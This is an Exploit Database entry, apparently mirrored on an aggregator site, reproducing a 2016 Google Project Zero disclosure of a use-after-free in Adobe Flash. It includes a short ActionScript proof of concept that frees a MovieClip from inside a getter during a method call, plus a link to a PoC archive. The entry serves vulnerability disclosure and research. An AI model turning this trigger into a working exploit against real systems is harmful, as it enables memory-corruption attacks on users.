Adobe Flash – Method Calls Use-After-Free

• Exploit Database
• 14 阅读

• 作者： Google Security Research
  日期： 2016-09-08
• 类别：

  • dos
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/40356/

• Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=846
  
  If a method is called on a MovieClip, and a getter is set with the name of the method, the getter will get executed during the call, and can free the MovieClip, leading to a user-after-free. A minimal PoC is as follows:
  
  var mc =this.createEmptyMovieClip( "mc", 1);
  mc.addProperty( "f", func, func );
  mc.f("hello");
  
  function func(){
  	
  	mc.removeMovieClip();
  	// Fix heap
  	var d:Date = new Date();
  	return d.getDate;
  	
  	}	
  
  
  Proof of Concept:
  https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40356.zip